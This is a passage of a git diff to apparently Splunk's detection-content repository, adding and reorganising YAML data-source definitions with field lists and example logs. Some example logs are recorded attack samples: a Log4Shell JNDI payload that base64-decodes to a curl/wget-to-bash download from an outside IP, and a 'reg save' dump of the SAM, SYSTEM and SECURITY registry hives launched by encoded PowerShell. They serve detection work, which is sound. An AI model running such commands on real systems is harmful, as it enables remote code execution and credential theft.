+- UserAuthenticationMethod
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_method
+- authentication_service
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- host
+- index
+- linecount
+- object
+- punct
+- reason
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- tag
+- tag::action
+- tag::eventtype
+- user
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-10-10T17:08:65", "Id": "4593aac8-855f-4341-9d2a-4289146eb800",
+  "Operation": "UserLoginFailed", "OrganizationId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+  "RecordType": 15, "ResultStatus": "Failed", "UserKey": "57e4bd36-9722-4a4a-9729-7203d8e00b72",
+  "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "52.3.21.4",
+  "ObjectId": "Unknown", "UserId": "user30@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType":
+  1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "UserError"},
+  {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+  (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}, {"Name": "UserAuthenticationMethod",
+  "Value": "1"}, {"Name": "RequestType", "Value": "OAuth2:Token"}], "ModifiedProperties":
+  [], "Actor": [{"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 0}, {"ID":
+  "user30@contoso.onmicrosoft.com", "Type": 5}], "ActorContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+  "ActorIpAddress": "52.3.21.4", "InterSystemsId": "97e59adc-b4be-4ea6-8f17-b46677242190",
+  "IntraSystemId": "eeeba3a0-c619-437a-9879-3dd009f9bf00", "SupportTicketId": "",
+  "Target": [{"ID": "Unknown", "Type": 0}], "TargetContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc",
+  "ApplicationId": "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223", "DeviceProperties": [{"Name":
+  "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Chrome"}, {"Name":
+  "IsCompliantAndManaged", "Value": "False"}], "ErrorNumber": "50126", "LogonError":
+  "InvalidUserNameOrPassword"}'
diff --git a/data_sources/okta.yml b/data_sources/okta.yml
new file mode 100644
index 0000000000..312dcdad22
--- /dev/null
+++ b/data_sources/okta.yml
@@ -0,0 +1,12 @@
+name: Okta
+id: ec26febe-e760-4981-bbee-72e107c7b9d2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Okta
+source: Okta
+sourcetype: OktaIM2:log
+supported_TA:
+- name: Splunk Add-on for Okta Identity Cloud
+  url: https://splunkbase.splunk.com/app/6553
+  version: 2.2.0
diff --git a/data_sources/endpoint/osquery.yml b/data_sources/osquery.yml
similarity index 96%
rename from data_sources/endpoint/osquery.yml
rename to data_sources/osquery.yml
index b889cc2860..8bcd9cdd79 100644
--- a/data_sources/endpoint/osquery.yml
+++ b/data_sources/osquery.yml
@@ -1,10 +1,13 @@
 name: osquery
 id: 7ec4d7c8-c1d0-423a-9169-261f6adb74c0
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for osquery
 source: osquery
 sourcetype: osquery:results
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
 fields:
 - _time
 - calendarTime
diff --git a/data_sources/network/Palo_Alto_Network_Threat.yml b/data_sources/palo_alto_network_threat.yml
similarity index 66%
rename from data_sources/network/Palo_Alto_Network_Threat.yml
rename to data_sources/palo_alto_network_threat.yml
index dd6bb5cf6b..13ba7cecd1 100644
--- a/data_sources/network/Palo_Alto_Network_Threat.yml
+++ b/data_sources/palo_alto_network_threat.yml
@@ -1,34 +1,35 @@
 name: Palo Alto Network Threat
 id: 375c2b0e-d216-41ad-9406-200464595209
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Palo Alto Network Threat
 source: pan:threat
 sourcetype: pan:threat
 supported_TA:
-  name: Palo Alto Networks Add-on for Splunk
-  version: 8.1.1
+- name: Palo Alto Networks Add-on for Splunk
   url: https://splunkbase.splunk.com/app/2757
-event_names: []
+  version: 8.1.1
 fields:
-  - _time
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - host
-  - index
-  - linecount
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timeendpos
-  - timestartpos
-example_log:
-  May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
+- _time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- host
+- index
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
   11:08:38,2.18.4.7,1.2.3.4,2.18.4.7,1.2.3.4,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,Zero,2022/05/10
   11:08:38,1535535,1,32880,443,32880,20077,0x1403000,tcp,allow,"sr.example.com/mgmt/tm/util/bash",(9999),allow-URL,informational,client-to-server,7081856864553612091,0xa000000000000000,United
   States,United States,0,,0,,,1,"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36
diff --git a/data_sources/network/Palo_Alto_Network_Traffic.yml b/data_sources/palo_alto_network_traffic.yml
similarity index 63%
rename from data_sources/network/Palo_Alto_Network_Traffic.yml
rename to data_sources/palo_alto_network_traffic.yml
index ee442a5592..773e2b1afa 100644
--- a/data_sources/network/Palo_Alto_Network_Traffic.yml
+++ b/data_sources/palo_alto_network_traffic.yml
@@ -1,34 +1,35 @@
 name: Palo Alto Network Traffic
 id: 182a83bc-c31a-4817-8c7a-263744cec52a
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Palo Alto Network Traffic
 source: screenconnect_palo_traffic
 sourcetype: pan:traffic
 supported_TA:
-  name: Palo Alto Networks Add-on for Splunk
-  version: 8.1.1
+- name: Palo Alto Networks Add-on for Splunk
   url: https://splunkbase.splunk.com/app/2757
-event_names: []
+  version: 8.1.1
 fields:
-  - _time
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - host
-  - index
-  - linecount
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timeendpos
-  - timestartpos
-example_log:
-  577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
+- _time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- host
+- index
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: 577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
   1,2024/02/22 12:33:50,012801036556,TRAFFIC,end,2305,2024/02/22 12:33:50,192.168.1.205,147.28.146.44,201.17.96.104,147.28.146.44,No_Vuln_Filtering_OUT,,,screenconnect,vsys1,Trust,Untrust,ethernet1/2,ethernet1/1,splunk_range,2024/02/22
   12:33:50,14740,1,50624,443,11024,443,0x40005e,tcp,allow,7419,6609,810,25,2024/02/22
   12:32:29,65,any,0,376156893,0x0,192.168.0.0-192.168.255.255,United States,0,14,11,tcp-fin,0,0,0,0,,PALO220,from-policy,,,0,,0,,N/A,0,0,0,0,0862e58b-4a54-436b-b3ac-ea3eccf8403b,0,0,,,,,,,
diff --git a/data_sources/pingid.yml b/data_sources/pingid.yml
new file mode 100644
index 0000000000..1342a8c5d5
--- /dev/null
+++ b/data_sources/pingid.yml
@@ -0,0 +1,39 @@
+name: PingID
+id: 17890675-61c1-40bd-a88e-6a8e9e246b43
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for PingID
+source: XmlWinEventLog:Security
+sourcetype: XmlWinEventLog
+supported_TA: []
+fields:
+- _time
+- actors{}.name
+- actors{}.type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- extracted_source
+- host
+- id
+- index
+- linecount
+- punct
+- recorded
+- resources{}.ipaddress
+- resources{}.websession
+- result.message
+- result.status
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: '{"source":"PINGID","id":"b2eb1fef-651b-11ee-b38b-0ac7a554ed19","recorded":"2023-10-05T14:10:53.538Z","actors":[{"type":"user","name":"victim_user"}],"resources":[{"ipaddress":"174.235.80.142","websession":"webs_ijkF-T_bAC_G3w2TfvdpAEQeC545KFlqVFOsolCXdjo"}],"result":{"status":"SUCCESS","message":"Device
+  Paired SMS \"Mobile 1\""}}'
diff --git a/data_sources/endpoint/Powershell_Installed_IIS_Modules.yml b/data_sources/powershell_installed_iis_modules.yml
similarity index 76%
rename from data_sources/endpoint/Powershell_Installed_IIS_Modules.yml
rename to data_sources/powershell_installed_iis_modules.yml
index 6f55783abd..663658c8a6 100644
--- a/data_sources/endpoint/Powershell_Installed_IIS_Modules.yml
+++ b/data_sources/powershell_installed_iis_modules.yml
@@ -1,10 +1,13 @@
 name: Powershell Installed IIS Modules
 id: 4f2ccf42-3503-4417-a684-bfccf7f0d7b4
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Powershell Installed IIS Modules
 source: powershell://AppCmdModules
 sourcetype: Pwsh:InstalledIISModules
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
 fields:
 - _time
 - Schema
diff --git a/data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml b/data_sources/powershell_script_block_logging_4104.yml
similarity index 77%
rename from data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml
rename to data_sources/powershell_script_block_logging_4104.yml
index 8247f45510..7e31c1dbbc 100644
--- a/data_sources/endpoint/Powershell_Script_Block_Logging_4104.yml
+++ b/data_sources/powershell_script_block_logging_4104.yml
@@ -1,13 +1,15 @@
 name: Powershell Script Block Logging 4104
 id: 5cfd0c72-d989-47a0-92f9-6edc6f8d3564
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Powershell Script Block Logging 4104
 source: XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
 sourcetype: xmlwineventlog
 supported_TA:
-  name: Splunk Add-on for Microsoft Windows
-  version: 8.8.0
+- name: Splunk Add-on for Microsoft Windows
   url: https://splunkbase.splunk.com/app/742
-event_names: []
+  version: 8.8.0
 fields:
 - _time
 - ActivityID
@@ -62,22 +64,6 @@ fields:
 - timestartpos
 - user_id
 - vendor_product
-field_mappings:
-  - data_model: cim
-    data_set: Endpoint.Processes
-    mapping:
-      Computer: Processes.dest
-      Path: Processes.process_path
-      ScriptBlockId: Processes.process_id
-      ScriptBlockText: Processes.process
-      UserID: Processes.user_id
-  - data_model: ocsf
-    mapping:
-      Computer: device.hostname
-      Path: process.file.path
-      ScriptBlockId: process.uid
-      ScriptBlockText: process.cmd_line
-      UserID: actor.user.uid
 example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
   Name='Microsoft-Windows-PowerShell' Guid='{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'/><EventID>4104</EventID><Version>1</Version><Level>5</Level><Task>2</Task><Opcode>15</Opcode><Keywords>0x0</Keywords><TimeCreated
   SystemTime='2022-05-02T12:39:41.710158900Z'/><EventRecordID>112748</EventRecordID><Correlation
diff --git a/data_sources/endpoint/Powershell_SIP_Inventory.yml b/data_sources/powershell_sip_inventory.yml
similarity index 63%
rename from data_sources/endpoint/Powershell_SIP_Inventory.yml
rename to data_sources/powershell_sip_inventory.yml
index d631f5da43..f5dfea49f6 100644
--- a/data_sources/endpoint/Powershell_SIP_Inventory.yml
+++ b/data_sources/powershell_sip_inventory.yml
@@ -1,7 +1,10 @@
 name: Powershell SIP Inventory
 id: 5ef5cb5d-1fa8-4567-b48f-27317662cd73
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Powershell SIP Inventory
 source: powershell://SubjectInterfacePackage
 sourcetype: PwSh:SubjectInterfacePackage
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
diff --git a/data_sources/splunk.yml b/data_sources/splunk.yml
new file mode 100644
index 0000000000..59728f1060
--- /dev/null
+++ b/data_sources/splunk.yml
@@ -0,0 +1,35 @@
+name: Splunk
+id: d8a2c791-460b-4756-a8e5-ecade77b21e3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Splunk
+source: splunkd_ui_access.log
+sourcetype: splunkd_ui_access
+supported_TA: []
+fields:
+- _time
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- host
+- index
+- info
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestamp
+- timestartpos
+- user
+example_log: 'Audit:[timestamp=01-25-2023 22:08:54.818, user=admin, action=search,
+  info=granted REST: /search/jobs/rt_1674684525.24/events]'
diff --git a/data_sources/endpoint/Splunk_Stream_HTTP.yml b/data_sources/splunk_stream_http.yml
similarity index 93%
rename from data_sources/endpoint/Splunk_Stream_HTTP.yml
rename to data_sources/splunk_stream_http.yml
index 3544fc552d..832dea60ff 100644
--- a/data_sources/endpoint/Splunk_Stream_HTTP.yml
+++ b/data_sources/splunk_stream_http.yml
@@ -1,13 +1,15 @@
 name: Splunk Stream HTTP
 id: b0070a33-92ed-49e5-8f38-576cdf300710
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Splunk Stream HTTP
 source: stream:http
 sourcetype: stream:http
 supported_TA:
-  name: Splunk App for Stream
-  version: 8.1.1
+- name: Splunk App for Stream
   url: https://splunkbase.splunk.com/app/1809
-event_names: []
+  version: 8.1.1
 fields:
 - _time
 - bytes
diff --git a/data_sources/splunk_stream_ip.yml b/data_sources/splunk_stream_ip.yml
new file mode 100644
index 0000000000..5e6a83beeb
--- /dev/null
+++ b/data_sources/splunk_stream_ip.yml
@@ -0,0 +1,79 @@
+name: Splunk Stream IP
+id: c96f5906-f601-4f32-a26c-482535159bc2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Splunk Stream IP
+source: stream:ip
+sourcetype: stream:ip
+supported_TA:
+- name: Splunk App for Stream
+  url: https://splunkbase.splunk.com/app/1809
+  version: 8.1.1
+fields:
+- _time
+- action
+- app
+- bytes
+- bytes_in
+- bytes_out
+- category
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_ip
+- dest_port
+- eventtype
+- host
+- http_content_type
+- http_method
+- http_referer
+- http_referrer
+- http_user_agent
+- http_user_agent_length
+- http_x_forwarded_for
+- http_x_header
+- https
+- index
+- linecount
+- nginx_version
+- product
+- protocol
+- punct
+- request_time
+- response_time
+- server
+- site
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- status_description
+- status_type
+- tag
+- tag::eventtype
+- time_local
+- timeendpos
+- timestartpos
+- uri_path
+- url
+- url_domain
+- url_length
+- vendor
+- vendor_product
+- version
+- web_server
+example_log: site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
+  src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000"
+  protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]"
+  http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-"
+  uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004"
+  category="application/json" https=""
diff --git a/data_sources/network/Splunk_Stream_TCP.yml b/data_sources/splunk_stream_tcp.yml
similarity index 65%
rename from data_sources/network/Splunk_Stream_TCP.yml
rename to data_sources/splunk_stream_tcp.yml
index 27f52bd8b9..5b8f4de4a6 100644
--- a/data_sources/network/Splunk_Stream_TCP.yml
+++ b/data_sources/splunk_stream_tcp.yml
@@ -1,10 +1,12 @@
 name: Splunk Stream TCP
 id: 4b1233d1-f80a-4da1-ab27-a5b10ea8a4ce
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Splunk Stream TCP
 source: stream:tcp
 sourcetype: stream:tcp
 supported_TA:
-  name: Splunk App for Stream
-  version: 8.1.1
+- name: Splunk App for Stream
   url: https://splunkbase.splunk.com/app/1809
-event_names: []
+  version: 8.1.1
diff --git a/data_sources/web/Suricata.yml b/data_sources/suricata.yml
similarity index 50%
rename from data_sources/web/Suricata.yml
rename to data_sources/suricata.yml
index a488015c26..b27ac0af4b 100644
--- a/data_sources/web/Suricata.yml
+++ b/data_sources/suricata.yml
@@ -1,55 +1,58 @@
 name: Suricata
 id: 64b245d4-a4d1-4865-a718-c83d3b939f2e
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Suricata
 source: suricata
 sourcetype: suricata
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
 fields:
-  - _time
-  - app_proto
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest_ip
-  - dest_port
-  - event_type
-  - flow.age
-  - flow.alerted
-  - flow.bytes_toclient
-  - flow.bytes_toserver
-  - flow.end
-  - flow.pkts_toclient
-  - flow.pkts_toserver
-  - flow.reason
-  - flow.start
-  - flow.state
-  - flow_id
-  - host
-  - in_iface
-  - index
-  - linecount
-  - proto
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - src_ip
-  - src_port
-  - tcp.ack
-  - tcp.fin
-  - tcp.psh
-  - tcp.state
-  - tcp.syn
-  - tcp.tcp_flags
-  - tcp.tcp_flags_tc
-  - tcp.tcp_flags_ts
-  - timeendpos
-  - timestamp
-  - timestartpos
+- _time
+- app_proto
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest_ip
+- dest_port
+- event_type
+- flow.age
+- flow.alerted
+- flow.bytes_toclient
+- flow.bytes_toserver
+- flow.end
+- flow.pkts_toclient
+- flow.pkts_toserver
+- flow.reason
+- flow.start
+- flow.state
+- flow_id
+- host
+- in_iface
+- index
+- linecount
+- proto
+- punct
+- source
+- sourcetype
+- splunk_server
+- src_ip
+- src_port
+- tcp.ack
+- tcp.fin
+- tcp.psh
+- tcp.state
+- tcp.syn
+- tcp.tcp_flags
+- tcp.tcp_flags_tc
+- tcp.tcp_flags_ts
+- timeendpos
+- timestamp
+- timestartpos
 example_log: '{"timestamp":"2023-10-17T01:24:52.149017+0000","flow_id":721124494649885,"in_iface":"ens5","event_type":"flow","src_ip":"192.0.2.1","src_port":30880,"dest_ip":"192.0.2.2","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":640,"bytes_toclient":660,"start":"2023-10-17T01:20:23.829981+0000","end":"2023-10-17T01:22:11.831172+0000","age":108,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}}'
diff --git a/data_sources/sysmon_eventid_1.yml b/data_sources/sysmon_eventid_1.yml
new file mode 100644
index 0000000000..6e279b4518
--- /dev/null
+++ b/data_sources/sysmon_eventid_1.yml
@@ -0,0 +1,171 @@
+name: Sysmon EventID 1
+id: b375f4d1-d7ca-4bc0-9103-294825c0af17
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 1
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- CommandLine
+- Company
+- Computer
+- CurrentDirectory
+- Description
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- FileVersion
+- Guid
+- Hashes
+- IMPHASH
+- Image
+- IntegrityLevel
+- Keywords
+- Level
+- LogonGuid
+- LogonId
+- MD5
+- Name
+- Opcode
+- OriginalFileName
+- ParentCommandLine
+- ParentImage
+- ParentProcessGuid
+- ParentProcessId
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Product
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- TerminalSessionId
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- original_file_name
+- os
+- parent_process
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process
+- process_current_directory
+- process_exec
+- process_guid
+- process_hash
+- process_id
+- process_integrity_level
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_product
+field_mappings:
+  - data_model: cim
+    data_set: Endpoint.Processes
+    mapping:
+      ProcessGuid: Processes.process_guid
+      ProcessId: Processes.process_id
+      Image: Processes.process_path
+      Image|endswith: Processes.process_name
+      CommandLine: Processes.process
+      CurrentDirectory: Processes.process_current_directory
+      User: Processes.user
+      IntegrityLevel: Processes.process_integrity_level
+      Hashes: Processes.process_hash
+      ParentProcessGuid: Processes.parent_process_guid
+      ParentProcessId: Processes.parent_process_id
+      ParentImage: Processes.parent_process_name
+      ParentCommandLine: Processes.parent_process
+      Computer: Processes.dest
+      OriginalFileName: Processes.original_file_name
+convert_to_log_source:
+  - data_source: Windows Event Log Security 4688
+    mapping:
+      ProcessId: NewProcessId
+      Image: NewProcessName
+      Image|endswith: NewProcessName|endswith
+      CommandLine: Process_Command_Line
+      User: SubjectUserSid
+      ParentProcessId: ProcessId
+      ParentImage: ParentProcessName
+      ParentImage|endswith: ParentProcessName|endswith
+      Computer: Computer
+      OriginalFileName: NewProcessName|endswith
+  - data_source: Crowdstrike Process
+    mapping:
+      ProcessId: RawProcessId
+      Image: ImageFileName
+      CommandLine: CommandLine
+      User: UserSid
+      ParentProcessId: ParentProcessId
+      ParentImage: ParentBaseFileName
+example_log: "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider\
+  \ Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated\
+  \ SystemTime='2020-10-08T11:03:46.617920300Z'/><EventRecordID>4522</EventRecordID><Correlation/><Execution\
+  \ ProcessID='2912' ThreadID='3424'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-6764986.attackrange.local</Computer><Security\
+  \ UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2020-10-08\
+  \ 11:03:46.615</Data><Data Name='ProcessGuid'>{96128EA2-F212-5F7E-E400-000000007F01}</Data><Data\
+  \ Name='ProcessId'>2296</Data><Data Name='Image'>C:\\Windows\\System32\\cmd.exe</Data><Data\
+  \ Name='FileVersion'>10.0.14393.0 (rs1_release.160715-1616)</Data><Data Name='Description'>Windows\
+  \ Command Processor</Data><Data Name='Product'>Microsoft\xAE Windows\xAE Operating\
+  \ System</Data><Data Name='Company'>Microsoft Corporation</Data><Data Name='OriginalFileName'>Cmd.Exe</Data><Data\
+  \ Name='CommandLine'>\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam\
+  \ %%temp%%\\sam &amp; reg save HKLM\\system %%temp%%\\system &amp; reg save HKLM\\\
+  security %%temp%%\\security\" </Data><Data Name='CurrentDirectory'>C:\\Users\\ADMINI~1\\\
+  AppData\\Local\\Temp\\</Data><Data Name='User'>ATTACKRANGE\\Administrator</Data><Data\
+  \ Name='LogonGuid'>{96128EA2-F210-5F7E-ACD4-080000000000}</Data><Data Name='LogonId'>0x8d4ac</Data><Data\
+  \ Name='TerminalSessionId'>0</Data><Data Name='IntegrityLevel'>High</Data><Data\
+  \ Name='Hashes'>MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A</Data><Data\
+  \ Name='ParentProcessGuid'>{96128EA2-F211-5F7E-DF00-000000007F01}</Data><Data Name='ParentProcessId'>4624</Data><Data\
+  \ Name='ParentImage'>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data><Data\
+  \ Name='ParentCommandLine'>\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==</Data></EventData></Event>"
diff --git a/data_sources/sysmon_eventid_10.yml b/data_sources/sysmon_eventid_10.yml
new file mode 100644
index 0000000000..bef6271097
--- /dev/null
+++ b/data_sources/sysmon_eventid_10.yml
@@ -0,0 +1,102 @@
+name: Sysmon EventID 10
+id: 659cd5a8-148a-4c59-ade1-05f41ac1b096
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 10
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- CallTrace
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- GrantedAccess
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceImage
+- SourceProcessGUID
+- SourceProcessId
+- SourceThreadId
+- SystemTime
+- System_Props_Xml
+- TargetImage
+- TargetProcessGUID
+- TargetProcessId
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- granted_access
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>10</EventID><Version>3</Version><Level>4</Level><Task>10</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2022-02-01T21:01:44.672666100Z'/><EventRecordID>150624412</EventRecordID><Correlation/><Execution
+  ProcessID='2992' ThreadID='3220'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-128.attackrange.local</Computer><Security
